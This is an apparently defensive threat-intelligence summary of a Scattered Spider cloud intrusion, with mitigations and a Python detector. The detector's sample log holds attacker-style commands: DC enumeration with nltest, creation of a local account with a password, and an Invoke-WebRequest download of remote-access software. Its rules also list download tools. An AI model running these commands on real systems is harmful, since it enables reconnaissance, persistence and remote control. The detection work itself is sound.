Full Report
In May 2024, CrowdStrike observed the cyber threat group Scattered Spider establish a foothold on a cloud-hosted virtual machine (VM) using a cloud service VM management agent. The attackers compromised existing credentials through a phishing campaign to authenticate to the cl...
Analysis Summary
# Threat Actor: Scattered Spider
## Attribution & Identity
* **Name:** Scattered Spider
* **Known Aliases/Associated Groups:** 0ktapus (listed as an associated actor in the source metadata).
## Activity Summary
In May 2024, Scattered Spider established a foothold on a cloud-hosted virtual machine (VM) using credentials compromised through a phishing campaign. With those credentials the actor authenticated to the cloud control plane and then used the cloud service VM management agent to run commands on the VM, so the control plane itself became the path onto the host rather than a network logon to the guest. Once on the host the actor performed reconnaissance, created a local account, and attempted to pull down remote access software. The intrusion spanned three domains: email (phishing), the cloud control plane (authentication and agent-driven command execution), and the VM (host reconnaissance and persistence).
## Tactics, Techniques & Procedures
* **Initial Access:** Existing credentials compromised via a phishing campaign.
* **Valid Accounts:** Use of the valid but compromised credentials to authenticate to the cloud control plane.
* **Execution:** Running commands on the cloud-hosted VM through the cloud service VM management agent, reaching the guest OS from the control plane rather than over the network; this is also the channel through which the foothold on the VM was established.
* **Reconnaissance:**
* Using `ping` to test connectivity to internal and external domains.
* Using `nltest` (several command variants) to enumerate domain controllers (DCs).
* Using `wmic` to enumerate installed software on the host.
* **Persistence:** Creation of a new local user account on the host.
* **Command and Control (C2):** Attempted download of remote access software (FleetDeck) to the host.
## Targeting
* **Sectors:** Not specified in the source; the case concerns a cloud-hosted environment but no industry is named.
* **Geography:** Not specified in the provided context.
* **Victims:** No specific organizations named.
## Tools & Infrastructure
* **Tools:** FleetDeck, a legitimate commercial remote monitoring and management (RMM) tool; the actor attempted to download it to the host. No custom malware is described.
* **Infrastructure:** No attacker-controlled infrastructure is described. The victim's own cloud service VM management agent was abused as the execution channel from the control plane to the VM.
## Implications
Scattered Spider is relying on legitimate cloud management tooling and stolen credentials rather than exploits or custom malware, so most steps of the intrusion look individually legitimate. Because the chain crosses email, the cloud control plane and the guest OS (email -> cloud control plane -> VM), a team that monitors each domain in isolation sees only fragments: a phishing lure, a successful cloud login, an administrative agent running commands. Correlating control-plane activity (which identity authenticated, which agent command was issued) with the resulting host telemetry is what makes the sequence visible, and the ability to operate this way across domains indicates a mature understanding of cloud environments.
## Mitigations
* Require phishing-resistant multi-factor authentication (MFA), such as FIDO2/WebAuthn, for every cloud control plane access route, so that credentials harvested by phishing are not sufficient to authenticate.
* Log and alert on command execution through cloud VM management agents, and correlate each agent-issued command with the control-plane identity and session that issued it; treat agent-launched shells on production VMs as privileged actions that need a change record.
* Alert on reconnaissance with native host tools (`ping` against internal domains, `nltest`, `wmic product get`) shortly after a cloud control-plane authentication, especially when the parent process is the VM management agent.
* Alert on local account creation on cloud hosts (for example `net user <name> <password> /add`) and, where possible, block it by policy, since cloud VMs should use centrally managed identities.
* Restrict downloading and executing unapproved remote access/RMM software such as FleetDeck with application allow-listing and egress filtering.
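The following is an added example, not part of the CrowdStrike report, of the correlation logic the mitigations above call for. It scores process-creation events against the host tools listed under Tactics, Techniques & Procedures, clusters matching events per host inside a time window, and raises severity when the commands were launched by a cloud VM management agent, which is the control-plane-to-VM pivot described in this case. The log format, the agent process names in `CLOUD_AGENT_PARENTS`, the FleetDeck download command and all sample events are constructed assumptions for illustration; the report names none of them.

```python
"""Correlate host-tool reconnaissance, local account creation and RMM download
with execution via a cloud VM management agent (added example, not from the report)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption (not from the report): parent process names under which a cloud
# provider's VM management agent runs operator-supplied commands. Real names
# differ per provider and must be tuned for the monitored environment.
CLOUD_AGENT_PARENTS = {"vm-management-agent.exe", "cloud-run-command.exe"}

# One rule per technique in the TTP list; patterns run over the lowercased command line.
RULES = [
    ("recon.ping", re.compile(r"^ping(\.exe)?\s+\S")),
    ("recon.nltest_dc", re.compile(r"^nltest(\.exe)?\s+/(dclist|dsgetdc|domain_trusts)")),
    ("recon.wmic_software", re.compile(r"^wmic(\.exe)?\s+product\s+get\b")),
    ("persist.local_user_add", re.compile(r"^net1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b")),
    ("c2.rmm_download", re.compile(r"(invoke-webrequest|curl|certutil|bitsadmin).*fleetdeck")),
]

# Constructed sample telemetry (not real logs): ts|host|user|parent_image|command_line
SAMPLE_LOG = """\
2024-05-14T10:02:11Z|vm-prod-01|SYSTEM|vm-management-agent.exe|ping corp.example.internal
2024-05-14T10:02:40Z|vm-prod-01|SYSTEM|vm-management-agent.exe|nltest /dclist:corp.example.internal
2024-05-14T10:03:05Z|vm-prod-01|SYSTEM|vm-management-agent.exe|nltest /dsgetdc:corp.example.internal
2024-05-14T10:03:30Z|vm-prod-01|SYSTEM|vm-management-agent.exe|wmic product get name,version
2024-05-14T10:05:02Z|vm-prod-01|SYSTEM|vm-management-agent.exe|net user svc_backup Summer2024! /add
2024-05-14T10:06:15Z|vm-prod-01|SYSTEM|vm-management-agent.exe|powershell -c Invoke-WebRequest https://fleetdeck.example/agent.exe -OutFile fd.exe
2024-05-14T11:30:00Z|vm-prod-02|alice|explorer.exe|ping 8.8.8.8
2024-05-14T11:31:00Z|vm-prod-02|alice|explorer.exe|notepad.exe
"""


def classify(cmd):
    """Return the labels of every rule whose pattern matches the command line."""
    lowered = cmd.strip().lower()
    return [label for label, rx in RULES if rx.search(lowered)]


def parse_events(text):
    """Parse pipe-separated events into dicts with a parsed timestamp and rule labels."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, parent, cmd = line.split("|", 4)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host, "user": user,
            "parent": parent.lower(), "cmd": cmd,
            "labels": classify(cmd),
        })
    return events


def detect(events, window=timedelta(minutes=30), min_labels=2):
    """Cluster matching events per host inside `window` and alert when a cluster
    covers at least `min_labels` distinct techniques. A single ping is noise; ping
    plus DC enumeration plus a new local user within half an hour is not."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["labels"]:
            by_host[ev["host"]].append(ev)

    alerts = []

    def flush(cluster):
        labels = {lbl for ev in cluster for lbl in ev["labels"]}
        if len(labels) < min_labels:
            return
        via_agent = any(ev["parent"] in CLOUD_AGENT_PARENTS for ev in cluster)
        # Agent-launched recon, or any persistence/C2 step, is treated as high severity.
        high = via_agent or bool(labels & {"persist.local_user_add", "c2.rmm_download"})
        alerts.append({
            "host": cluster[0]["host"],
            "start": cluster[0]["ts"].isoformat(),
            "end": cluster[-1]["ts"].isoformat(),
            "via_agent": via_agent,
            "labels": sorted(labels),
            "event_count": len(cluster),
            "severity": "high" if high else "medium",
        })

    for evs in by_host.values():
        cluster = [evs[0]]
        for ev in evs[1:]:
            if ev["ts"] - cluster[0]["ts"] <= window:
                cluster.append(ev)
            else:
                flush(cluster)
                cluster = [ev]
        flush(cluster)
    return alerts


def run_sample():
    """Run the detector over the constructed sample log."""
    return detect(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

In production the events would come from EDR or Sysmon process-creation telemetry rather than a pipe-separated string, and the alert should be joined to the control-plane audit record (which principal issued the agent command, from where, and whether MFA was satisfied) so the analyst sees the email-to-control-plane-to-VM chain as one incident rather than three unrelated signals.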